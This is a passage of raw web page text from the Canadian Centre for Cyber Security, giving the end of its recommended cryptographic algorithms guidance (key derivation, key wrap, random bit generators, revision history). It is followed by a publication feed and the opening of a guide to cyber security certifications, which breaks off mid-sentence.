Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/135/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-135 Rev. 1: Recommendation for Existing Application-Specific Key Derivation Functions</a>.</p> <h3 id="a106">10.6 Secure Shell Key Derivation Function</h3> <p>When used in the context of the Secure Shell (SSH) protocol, we recommend the <abbr title="Secure Shell">SSH</abbr> <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/135/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-135 Rev. 1: Recommendation for Existing Application-Specific Key Derivation Functions</a>.</p> <h3 id="a107">10.7 Secure Real-time Transport Protocol Key Derivation Function</h3> <p>When used in the context of the Secure Real-time Transport Protocol (SRTP), we recommend the <abbr title="Secure Real-time Transport Protocol">SRTP</abbr> <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/135/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-135 Rev. 1: Recommendation for Existing Application-Specific Key Derivation Functions</a>.</p> <h3 id="a108">10.8 Trusted Platform Module Key Derivation Function</h3> <p>When used in the context of a Trusted Platform Module (TPM) session, we recommend the <abbr title="Trusted Platform Module">TPM</abbr> <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/135/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-135 Rev. 1: Recommendation for Existing Application-Specific Key Derivation Functions</a>.</p> <h3 id="a109">10.9 Password-based Key Derivation Function</h3> <p>For protected data on storage devices, we recommend the Password-based <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/132/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-132: Recommendation for Password-Based Key Derivation: Part 1: Storage Applications</a>, using a password of at least 12 characters. For more information on passwords and passphrases, read the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/guidance/best-practices-passphrases-and-passwords-itsap30032">Best practices for passphrases and passwords (ITSAP.30.032)</a>.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="b11">11 Key wrap modes of operation</h2> <p>The following sections outline the key wrap modes of operation that we recommend for key wrapping to protect the confidentiality and integrity of cryptographic keys used for protecting UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="b111">11.1 Advanced Encryption Standard Key Wrap</h3> <p>When input is known to always be a multiple of 64-bits, we recommend the <abbr title="Advanced Encryption Standard">AES</abbr> Key Wrap mode, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/f/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38F: Recommendation for Block Cipher Modes of Operation: Methods for Key Wrapping</a>.</p> <h3 id="b112">11.2 Advanced Encryption Standard Key Wrap with Padding</h3> <p>When input is not a multiple of 64-bits, we recommend the <abbr title="Advanced Encryption Standard">AES</abbr> Key Wrap with Padding mode, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/f/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38F: Recommendation for Block Cipher Modes of Operation: Methods for Key Wrapping</a>.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="b12">12 Random bit generators</h2> <p>An <abbr title="Random Bit Generator">RBG</abbr> produces a sequence of bits (0 or 1) which appear statistically independent and unbiased. We recommend <abbr title="Random Bit Generators">RBGs</abbr> as specified in <a href="https://csrc.nist.gov/pubs/sp/800/90/c/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-90C: Recommendation for Random Bit Generator (RBG) Constructions</a>. These constructions employ an entropy source and a Deterministic Random Bit Generator (DRBG).</p> <p>A <abbr title="Deterministic Random Bit Generator">DRBG</abbr> always produces the same output sequence when given the same initial seed. We recommend the following <abbr title="Deterministic Random Bit Generators">DRBGs</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/90/a/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-90A Rev. 1: Recommendation for Random Number Generation Using Deterministic Random Bit Generators</a>, for producing random bits for cryptographic applications that protect UNCLASSIFIED, PROTECTED A and PROTECTED B information:</p> <ul><li>Hash_DRBG</li> <li>HMAC_DRBG</li> <li>CTR_DRBG</li> </ul><p>The entropy source for <abbr title="Random Bit Generator">RBG</abbr> constructions and the initial seed for a <abbr title="Deterministic Random Bit Generator">DRBG</abbr> should comply with <a href="https://csrc.nist.gov/pubs/sp/800/90/b/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-90B Recommendations for Entropy Sources Used for Random Bit Generation</a> and should be assessed to be at least 112 bits.</p> <p><strong>The assessed entropy of the initial seed for a <abbr title="Deterministic Random Bit Generator">DRBG</abbr> should be increased to at least 128 bits by the end of 2030.</strong></p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="b13">13 Commercial technologies assurance programs</h2> <p>In addition to using the cryptographic algorithms, parameters and key lengths recommended in this publication, we recommend the following to ensure a suitable level of cryptographic security:</p> <ul><li>Cryptographic algorithm implementations should be tested and validated under the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program"><abbr title="National Institute of Standards and Technology">NIST</abbr> Cryptographic Algorithm Validation Program (CAVP)</a></li> <li>Cryptographic modules should be tested and validated under the <a href="/en/tools-services/cryptographic-module-validation-program-cmvp">Cryptographic Module Validation Program (CMVP)</a> for compliance with <a href="https://csrc.nist.gov/pubs/fips/140-3/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 140-3: Security Requirements for Cryptographic Modules</a></li> <li><abbr title="information technology">IT</abbr> security products should be certified to the <a href="/en/tools-services/common-criteria">Common Criteria</a> Standard by a Certificate Authorizing Member of the Common Criteria Recognition Arrangement</li> </ul><p>Products containing cryptographic modules validated under the <abbr title="Cryptographic Module Validation Program">CMVP</abbr> are referenced on <a href="https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search/all"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Cryptographic Module Validation Program">CMVP</abbr>-validated modules lists</a> and are accompanied by a vendor-supplied, non-proprietary security policy document (read <a href="/en/selecting-cmvp-validated-product">Selecting a <abbr title="Cryptographic Module Validation Program">CMVP</abbr> validated product</a>). The security policy document specifies the cryptographic security provided by a module and describes its capabilities, protection and access controls. We recommend using the security policy document to select suitable cryptographic security products and to configure those products in <abbr title="Federal Information Processing Standards">FIPS</abbr>-approved modes of operation, as defined in <a href="https://csrc.nist.gov/csrc/media/Projects/cryptographic-module-validation-program/documents/fips%20140-3/FIPS%20140-3%20IG.pdf">Implementation Guidance for <abbr title="Federal Information Processing Standards">FIPS</abbr> PUB 140-3 and the Cryptographic Module Validation Program (PDF)</a>, to ensure that only the algorithms recommended by the Cyber Centre are used.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="b14">14 Summary</h2> <p>Cryptography provides security mechanisms which can be used to protect the authenticity, confidentiality and integrity of sensitive information. Several algorithms may be required to satisfy security requirements, and each algorithm should be selected and implemented to ensure these requirements are met. This publication provides guidance on the use of the cryptographic algorithms recommended by the Cyber Centre to protect UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="b15">A.1 Revisions</h2> <p>The original version of this document was published in August 2016. The summary below lists notable changes in the most recent revision (version 5), as well as in previous versions.</p> <h3>A1.1 Version 5</h3> <ul><li>We updated section 2 to say that this document now includes phase-out dates for quantum-vulnerable key establishment schemes and digital signature schemes</li> <li>We added phase-out dates for the use of all quantum-vulnerable key establishment schemes and digital signature schemes. The phase-out dates can be found in each affected subsection: <ul><li>For key establishment schemes: <ul><li>Section 5.1 Rivest-Shamir-Adelman</li> <li>Section 5.2 Finite Field Cryptography Diffie-Hellman and Menezes-Qu-Vanstone</li> <li>Section 5.3 Elliptic curve cryptography Cofactor Diffie-Hellman and Menezes-Qu-Vanstone</li> </ul></li> <li>For digital signature schemes: <ul><li>Section 6.1 Rivest-Shamir-Adelman</li> <li>Section 6.3 Elliptic Curve Digital Signature Algorithm (ECDSA)</li> <li>Section 6.4 Edwards Curve Digital Signature Algorithm (EdDSA)</li> </ul></li> <li>In section 5.2, we removed the specific parameter-size set recommendations to align with field size phase-out requirements</li> <li>We renamed section 12 from "Deterministic Random Bit Generators" to "Random Bit Generators" and added new guidance on the use of RBGs and entropy sources for RBGs</li> <li>We modified the third bullet point in section 13 for clarity</li> </ul></li> </ul><h3>A.1.2 Version 4 (March 2025)</h3> <ul><li>We included the new NIST post-quantum standards: <ul><li><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 203 Module-Lattice-Based Key-Encapsulation Mechanism (<a href="#a54">Section 5.4</a>)</li> <li><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 204 Module-Lattice-Based Digital Signature Standard (<a href="#a65">Section 6.5</a>)</li> <li><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 205 Stateless Hash-Based Digital Signature Standard (<a href="#a66">Section 6.6</a>)</li> </ul></li> <li>We updated the section on post-quantum cryptography and moved it to Section 2</li> <li>In Section 3, Encryption algorithms, we removed the subsections on TDEA and CAST5, as all use of TDEA and CAST5 should have been phased out by the end of 2023</li> <li>In Section 6.7, Stateful Hash-Based Signature Schemes, we clarified guidance for use of stateful hash-based signatures with respect to other post-quantum signature schemes</li> <li>In Section 8.7, Hash functions, extendable output functions, we added <abbr title="Module-Lattice-Based Key-Encapsulation Mechanism">ML-KEM</abbr>, <abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr>, and <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> to the list of algorithms that can use SHAKE. We also added the distinction that <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> and <abbr title="Edwards-Curve Digital Signature Algorithm">EdDSA</abbr> only allow for SHAKE256, (and for <abbr title="Edwards-Curve Digital Signature Algorithm">EdDSA</abbr> it is only with curve Ed448)</li> <li>In Section 9.2, Cipher-based message authentication code, we removed the statement requiring a key length increase to at least 128 bits by 2023. Instead, we recommended that <abbr title="Cipher-based Message Authentication Code">CMAC</abbr> only be used with <abbr title="Advanced Encryption Standard">AES</abbr>, as TDEA and CAST5 have been removed</li> <li>In Section 11: Key wrap modes of operation, we removed the subsection on TDEA Key Wrap, as all use of TDEA should have been phased out by the end of 2023</li> <li>We removed the supporting content section. References are linked throughout the document, glossary items are either defined in the text or in the Cyber Centre glossary, and abbreviations are spelled out when they first appear in the document</li> </ul><h3>A.1.3 Version 3 (March 2024)</h3> <ul><li>We made various changes to align with <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-5: <ul><li>In Section 4.3, <abbr title="Elliptic Curve Cryptography">ECC</abbr> <abbr title="Diffie-Hellman">DH</abbr> and <abbr title="Menezes-Qu-Vanstone">MQV</abbr> and Section 5.3 <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr>, we only recommend the use of 4 elliptic curves (Curve P-224, Curve P-256, Curve P-384 and Curve P-521). We added a note that Curve P-224 and all binary curves should be phased out by the end of 2030. In Section 5.3, we explicitly recommend deterministic <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr></li> <li>In Section 5, Digital signature schemes, we recommend phasing out DSA by the end of 2030, and added the new subsection 5.4 Edwards-Curve Digital Signature Algorithm</li> </ul></li> <li>We added a new section on <abbr title="extendable output functions">XOFs</abbr> (Section 7)</li> <li>In Section 8, Message authentication codes, we added the new subsection on <abbr title="KECCAK Message Authentication Code">KMAC</abbr> (Section 8.4)</li> <li>In Section 11, Deterministic random bit generators, we added the following requirements on the assessed entropy of the initial seed for a <abbr title="Deterministic Random Bit Generator">DRBG</abbr> <ul><li>The initial seed for a <abbr title="Deterministic Random Bit Generator">DRBG</abbr> should contain entropy assessed to be at least 112 bits. We recommend that additional entropy be periodically added to the <abbr title="Deterministic Random Bit Generator">DRBG</abbr> via the reseed function</li> <li>The assessed entropy of the initial seed for a <abbr title="Deterministic Random Bit Generator">DRBG</abbr> should be increased to at least 128 bits by the end of 2030</li> </ul></li> </ul><h3>A.1.4 Version 2 (August 2022)</h3> <ul><li>We updated language from "approved/discontinued" to "recommend/phase out"</li> <li>We replaced references to CSE with the Cyber Centre</li> <li>In Section 2: Encryption algorithms, we recommend phasing out CAST5 and TDEA by 2023. The 2016 version did not have a discontinuation date for CAST5, and version 2 recommended discontinuing TDEA by 2030. We also added a restriction that one key bundle should not be used to encrypt more than <span aria-hidden="true">2<sup>20</sup></span><span class="wb-inv">2 to the power of 20</span> 64-bit data blocks in TDEA</li> <li>In Section 3: Encryption algorithm modes of operation, we provided some additional guidance on the use of <abbr title="Electronic Codebook">ECB</abbr> mode, as well as recommendations for <abbr title="Initialization Vectors">IV</abbr> generation</li> <li>In Section 5: Digital signature schemes, we added a new subsection on Stateful Hash-based signature schemes</li> <li>In Section 6: Secure hash algorithms, we no longer recommend the use of <abbr title="Secure Hash Algorithm">SHA</abbr>-1, which was previouslyĀ approved for use with HMACs, KDFs and RBGs. We added stronger wording (in bold) warning against its use for any application that requires collision resistance. We also added phase-out dates for <abbr title="Secure Hash Algorithm">SHA</abbr>-224 and <abbr title="Secure Hash Algorithm">SHA</abbr>3-224</li> <li>In Section 7: Message Authentication Codes, we updated the recommendation for the <abbr title="Cipher-based Message Authentication Code">CMAC</abbr> key length to be increased to at least 128 bits by the end of 2023 (we previously recommended 2030). We also added the statement "<abbr title="Galois/Counter Mode Message Authentication Code">GMAC</abbr> is only recommended for use with the Advanced Encryption Standard (AES) algorithm as specified in Section 2.1", which was not explicitly stated in the previous version</li> <li>In Section 8: Key Derivation Functions, we updated some of the wording. For example, Single-Step <abbr title="Key Derivation Functions">KDFs</abbr> and Extraction-Then-Expansion <abbr title="Key Derivation Functions">KDFs</abbr> are now referred to as One-Step and Two-Step <abbr title="Key Derivation Functions">KDFs</abbr> respectively (this is consistent with the referenced <abbr title="National Institute of Standards and Technology">NIST</abbr> standards). We removed the IKEv1 <abbr title="Key Derivation Function">KDF</abbr> and added a section for password-based <abbr title="Key Derivation Functions">KDFs</abbr></li> <li>In Section 9: Key Wrap Modes of Operation, we no longer recommend the Triple Data Encryption Algorithm Key Wrap (TKW). We also recommend a phase-out date of 2023 (previously 2030)</li> <li>In Section 11: Commercial Technologies Assurance Programs, we added a reference to the <abbr title="Cryptographic Algorithm Validation Program">CAVP</abbr> and to the common criteria program. We also added the Cyber Centre website as reference</li> <li>We added a new section entitled "Preparing for post-quantum cryptography" (Section 12)</li> </ul><aside class="wb-fnote" role="note"><h2 id="fn">Footnotes</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>From <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186</a>, Deterministic <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr> "is a variant of <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr>, where a per-message secret number is a function of the message that is signed, thereby resulting in a deterministic mapping of messages to signatures". Signature verification in deterministic <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr> is unchanged from <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr>.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote </span>1<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></section></div> </div> </div> </div> </div> </div> </div> </article>
- Top 10 artificial intelligence security actions: A primer – ITSAP.10.049by Canadian Centre for Cyber Security on May 29, 2026 at 6:05 pm
Our top AI security actions are designed to help organizations of all sizes and sectors strengthen their cyber resilience.
- Frontier artificial intelligence (ITSAP.10.050)by Canadian Centre for Cyber Security on May 29, 2026 at 3:03 pm
This publication provides your organization with additional details on frontier AI, the associated risks and suggested mitigation measures to enhance your cyber security posture.
- Protect your devices from IMSI catchers (ITSAP.00.106)by Canadian Centre for Cyber Security on May 19, 2026 at 6:50 pm
An international mobile subscriber identity (IMSI) catcher is a type of cell site simulator (CSS) that impersonates a legitimate cell tower to exploit connected mobile devices. It is important to understand how IMSI catchers work in order to detect them and protect your sensitive information from being compromised.
- Cell site simulators – ITSM.00.108by Canadian Centre for Cyber Security on May 19, 2026 at 6:48 pm
This publication provides information on how CSS devices work, the security risks you should consider, and the mitigation actions you can take to better protect from CSS exploitations.
- Certifications in the field of cyber securityby Canadian Centre for Cyber Security on May 12, 2026 at 7:59 pm
<article data-history-node-id="569" about="/en/guidance/certifications-field-cyber-security" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–pdf download–> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/certificationsfieldcybersecurity-2026-e.pdf">Certifications in the field of cyber securityĀ – 2026 (PDF,Ā 829Ā KB)</a></p> </div> <h2 class="mrgn-tp-0">Foreword</h2> <p>The Certifications in the Field of Cyber Security is an <strong>unclassified</strong> publication. The guide provides information about many of the certifications available for prospective students and cyber security professionals. The intent is not to recommend any certification body or certification in particular, but to provide a listing of some of the different certifications that may help advance an individualās career in the field of cyber security.</p> <p>Information is sourced from the websites of the certification bodies referenced in this guide.</p> <div class="alert alert-warning"> <p>Disclaimer: The Communications Security Establishment does not endorse or recommend any of the certification bodies or certifications listed in this document. Information provided is intended to be a general summary of publicly available information and is provided for informational purposes only.</p> </div> <section><h2>Revision history</h2> <ol><li>First release: November 2020</li> <li>New certifications added and training providers removed: July 2022</li> <li>Updated Rogers Cybersecure Catalyst information: April 2023</li> <li>Team name changed and new certifications added: November 2023</li> <li>Updated certifications and added OSDA: June 2024</li> <li>Removed Rogers Cybersecure Catalyst information: March 2026</li> </ol></section><div class="clearfix">Ā </div> <details><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#A">1.0 Introduction</a></li> <li><a href="#B">2.0 Globally Recognized certifications bodies</a></li> <li><a href="#C">3.0 Cyber Security certification listings and descriptions</a></li> <li><a href="#D">4.0 Cyber Security Certification Listings and Descriptions</a></li> <li><a href="#E">5.0 Supporting Content</a></li> </ul></details><section><h2 id="A">1.0 Introduction</h2> <p>There continues to be a growing demand for qualified cyber security professionals and practitioners in Canada and around the world. With the increasing need for cyber security professionals, the value of IT certification is also increasing. The right certification can give you an advantage over other job candidates. Organizations are looking for talent with superior training and real-world experience.</p> <p>Obtaining a certification demonstrates to future employers that an individual is competent, skilled, and experienced in certain areas. Additionally, given the time and financial investment that many certifications require, some employers see certification as a measure of commitment to a career in the field.</p> <p>Certifications are not only a great supplement to a professionalās other qualifications; it can also lead to a salary increase. According to a study conducted by Global Knowledge, an individual with a certification can earn up to 15% more than those without it <sup id="fn1-ref"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Note </span>1</a></sup>. Furthermore, maintaining certification often requires meeting continuing education requirements, ensuring that certificate holders are keeping up to date on the latest technologies and can continue to keep their organizations safe from emerging cyber security threats.</p> <h3>1.1 The Canadian Centre for Cyber Security</h3> <p>The Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment, was officially launched in October 2018. The Cyber Centreās Academic Outreach and Engagement team works with universities, colleges, educational associations, education ministerial boards and private sector educators to build cyber security talent and capacity in Canada. The team also works with educators to enhance the communityās understanding of cyber security. Its mission is to ensure Canada is a global leader in cyber security by elevating cyber education.</p> <h3>1.2 Purpose</h3> <p>The primary audience for this guide is prospective cyber security students or professionals looking to advance their careers in the field. The guide highlights some of the more in-demand, globally recognized certifications offered by providers around the world. A complete list of certifications can be found at the end of the guide (Tables 1 to 14).</p> <div class="alert alert-warning"> <p>Disclaimer: CSE does not endorse or recommend any of the certification bodies or certifications listed in this document. Information provided is intended to be a general summary of publicly available information and is provided for informational purposes only.</p> </div> <p>Every effort has been made to ensure accuracy of information, however, due to the dynamic nature of curricula and cyber security, this guide will be reviewed on a regular basis to ensure it reflects the most current certification offerings. New certifications and other suggested changes can be submitted by email to <a href="mailto:cyberskills-cybercompetences@cyber.gc.ca">cyberskills-cybercompetences@cyber.gc.ca</a>.</p> </section><div class="pull-right mrgn-tp-md small text-muted mrgn-bttm-md"><a href="#wb-tphp" title="Return to Top of page">Top of page</a></div> <section><h2 id="B">2.0 Globally recognized certifications bodies</h2> <p>The following highlights some of the more popular and well-known cyber certifications available, in alphabetical order. A more comprehensive list of certifications can be found in the attached tables.</p> <div class="alert alert-info"> <p>CSE is not endorsing, supporting, or promoting any of the following certifications or certification bodies. This guide is solely for information purposes and should only be a starting point for anyone interested in obtaining a certification. We recommend that individuals do more in-depth research, while considering their own interests and career goals, time commitments and financial resources, before deciding which certification is right for them.</p> </div> <p>It should also be noted that while most of the certification bodies are American, their certifications are recognized around the world. Furthermore, candidates can find training through local providers, and many of the certification exams can be written at local testing centres, such as Pearson VUE, or taken online in your own home.</p> <div class="btn-group mrgn-tp-sm mrgn-bttm-md"><button class="btn btn-primary wb-toggle" data-toggle="{"selector": "details", "print": "on", "stateOn": "on", "stateOff": "off", "parent": "#expands-collapse"}" type="button">Expand | collapse all</button></div> <!– END TOGGLE Expand | collapse–> <div id="expands-collapse"> <details class="group" id="wb-auto-20"><summary><h3>2.1 CertNexus</h3> </summary><p>CertNexus offers certifications and micro-credentials in emerging technologies, such as Internet of Things (IoT), Artificial Intelligence (AI), and human-machine interfaces. Their four cyber security certifications are valid for three years.</p> <ul><li><strong>The Certified First Responder</strong> (CRF) certificate validates the knowledge and skills required to protect critical information and systems before, during, and after an incident.</li> <li><strong>Cyber Safe</strong> certification demonstrates that the holder can identify the most common risks involved in using mobile and cloud technologies, and to protect themselves and their organizations from cyber threats.</li> <li><strong>Cyber Secure Coder</strong> (CSC) certificate holders have learned about the vulnerabilities that undermine security, identification, and remediation of those vulnerabilities, as well as strategies for dealing with security defects.</li> <li>The <strong>IRBIZ</strong> micro-credential is for Information Technology (IT) leaders and executives who are responsible for complying with incident response legislation. Successfully completing the course and exam certifies that the candidate has the necessary skills to assess and respond to security threats, as well as operate a system and network security analysis platform.</li> </ul><p>A complete list of cyber security certifications offered by CertNexus can be found in <a href="#tab1">Section 5.1</a>.</p> </details><details class="group" id="wb-auto-21"><summary><h3>2.2 Cisco Systems</h3> </summary><p>Cisco Systems is a worldwide leader in networking hardware and solutions and most of todayās Internet traffic travels over Cisco-build network pathways. Obtaining one of their certifications demonstrates that you know how to work with Cisco solutions. There are five levels of certification in Ciscoās program:</p> <ul><li><strong>Entry</strong>: The starting point for individuals interested in starting a career as a networking professional.</li> <li><strong>Associate</strong>: Individuals master the essentials needed to launch a career and expand job possibilities with the latest technologies.</li> <li><strong>Professional</strong>: Individuals select a core technology track and a focused concentration exam to customize their professional level certification.</li> <li><strong>Expert</strong>: Certification is accepted worldwide as the most prestigious certification in the technology industry.</li> <li><strong>Architect</strong>: Demonstrates the architectural expertise of a network designer.</li> </ul><p>A complete list of cyber security certifications offered by Cisco Systems can be found in <a href="#tab2">Section 5.2</a>.</p> </details><details class="group" id="wb-auto-22"><summary><h3>2.3 Computing Technology Industry Association (CompTIA)</h3> </summary><p>The Computing Technology Industry Association (CompTIA) issues certifications in over 120 countries with over 2.2 million recipients. The organization also releases 50 industry studies each year tracking trends and changes. They offer numerous certifications covering a wide range of IT fields, including cyber security. The renewal process includes meeting continuing education requirements and paying the annual fees.</p> <ul><li><strong>CompTIA Advanced Security Practitioner</strong> (CASP+) is a performance-based certification for practitioners, rather than managers, at the advanced skill level of cyber security. CASP+ recipients have advanced-level knowledge of risk management, enterprise security operations and architecture, as well as research and collaboration.</li> <li><strong>CompTIA Cyber Security Analyst</strong> (CySA+) certification is a security analyst certification that covers advanced persistent threats in a post-2014 cyber security environment. It validates oneās expertise in security analytics, intrusion detection, and response.</li> <li><strong>CompTIA PenTest+</strong> is for cyber security professionals who are responsible for penetration testing and vulnerability management. Certification holders have demonstrated their up-to-date hands-on ability and knowledge to test devices in new environments, like cloud or mobile, as well as traditional desktops and servers.</li> <li><strong>CompTIA Security+</strong> is an entry-level certification. Certificate holders are experts in threat management, cryptography, identity management, security systems, security risk identification and mitigation, network access control, and security infrastructure. Candidates must have 2 yearsā experience in network security and have already obtained their Network+ certification.</li> </ul><p>A complete list of cyber security certifications offered by CompTIA can be found in <a href="#tab3">Section 5.3</a>.</p> </details><details class="group" id="wb-auto-23"><summary><h3>2.4 Council for Registered Ethical Security Testers (CREST)</h3> </summary><p>The Council for Registered Ethical Security Testers (CREST) is a not-for-profit organization that provides internationally recognized certification and accreditation for companies and individuals. It has chapters in the United Kingdon (UK), United States (US), Australia, Singapore, and Hong Kong. They provide examinations in Penetration Testing, Threat Intelligence, Incident Response, Security Architecture. The Incident Response has been approved by Government Communications Headquarters (GCHQ). CREST exams have three levels of accreditation for individuals:</p> <ul><li><strong>Practitioner</strong>Ā ā Entry into profession</li> <li><strong>Registered</strong>Ā ā Competent to work independently without supervision</li> <li><strong>Certified</strong>Ā ā Technically competent to run major projects and teams</li> </ul><p>A complete list of cyber security certifications can be found in <a href="#tab4">Section 5.4</a>.</p> </details><details class="group" id="wb-auto-24"><summary><h3>2.5 Certified Wireless Network Professionals</h3> </summary><p>Certified Wireless Network Professionals (CWNP) is a vendor-neutral wireless local area network (WLAN) certification program. CWNP offers four levels of enterprise WLAN certifications, from novice to expert. Their certification programs prepare IT professionals and WLAN administrators to specify, design, and manage WLAN infrastructure and applications.</p> <ul><li><strong>Certified Wireless Network Expert</strong> (CWNE) is the highest-level certification in the CWNP program. Certificate holders have the most advanced skills available in todayās enterprise Wi-Fi market. Candidates must pass four certification exams, complete commercial WLAN deployments, provide three recommendations, meet experience and publication requirements, and pass a peer review by the CWNE Board of Advisors.</li> <li><strong>Certified Wireless Security Professional</strong> (CWSP) is a professional level WLAN certification for the CWNP program that validates an individualās ability to assess the vulnerability of a network and help prevent attacks before they happen, perform WLAN security audits and implement compliance monitoring solutions, and design a networkās security architecture. Candidates must obtain Certified Wireless Network Administrator (CWNA) certification before they can earn CWNP certification.</li> </ul><p>A complete list of cyber security certifications offered by CWNP can be found in <a href="#tab5">Section 5.5</a>.</p> </details><details class="group" id="wb-auto-25"><summary><h3>2.6 EC Council</h3> </summary><p>EC Council is a cyber security technical certification board and operates in 145 countries. It is endorsed by the US Government, National Security Agency (NSA), and the Committee on National Security Systems (CNSS).</p> <ul><li>The <strong>Certified Ethical Hacker (ANSI)</strong> credential certifies oneās competence in the five phases of ethical hacking: reconnaissance, enumeration, gaining access, maintaining access, and covering tracks. Certification requires passing a 4-hour exam consisting of 125 questions.</li> <li>The <strong>Certified Ethical Hacker (Practical)</strong> designation targets the application of CEH skills to real-world security audit challenges and related scenarios. Candidates must complete a 6-hour exam featuring 20 case studies and obtain a 70% score.</li> <li>A <strong>Certified Ethical Hacker (Master)</strong> holds both the ANSI and Practical certifications.</li> <li>The <strong>Computer Hacking Forensics Investigator (CHFI)</strong> is another universally recognized certification that validates that the recipient is skilled in the areas of anti-hacking, digital forensics, and penetration testing.</li> <li>The <strong>Certified Network Defender (CND)</strong> certificate demonstrates a solid understanding of defensive security and the required expertise to secure data.</li> <li>The <strong>EC Council Disaster Recovery Professional (EDRP)</strong> certificate holders have the foundation for securing and restoring networks in the event of a disaster like malicious attacks.</li> </ul><p>A complete list of cyber security certifications offered by EC Council can be found in <a href="#tab6">Section 5.6</a>.</p> </details><details class="group" id="wb-auto-26"><summary><h3>2.7 Global Information Assurance Certification (GIAC)</h3> </summary><p>Global Information Assurance Certification (GIAC), founded by the SANS institute, specializes in technical and practical certification. Its certifications are linked to training courses provided by SANS and are recognized worldwide. Candidates for Expert Status certification are only required to pass an exam to obtain certification, which is valid for 4 years. To be eligible to renew at the end of the 4-year period, certificate holders must have 36 continuing education credits and pay the recertification fee or re-take the exam. Individuals wishing to pursue Gold Status certification must research and write a technical report or white paper. Gold Status indicates the holder has a deeper knowledge of a subject area.</p> <ul><li><strong>GIAC Security Essential Certification</strong> (GIAC) validates an individualās knowledge information security beyond the simple terminology and concepts. Recipients are skilled in active defense, cryptography, security policy and plans, incident handling, securing networks, etc.</li> <li><strong>GIAC Certified Intrusion Analyst</strong> (GCIA) validates a practitioner’s 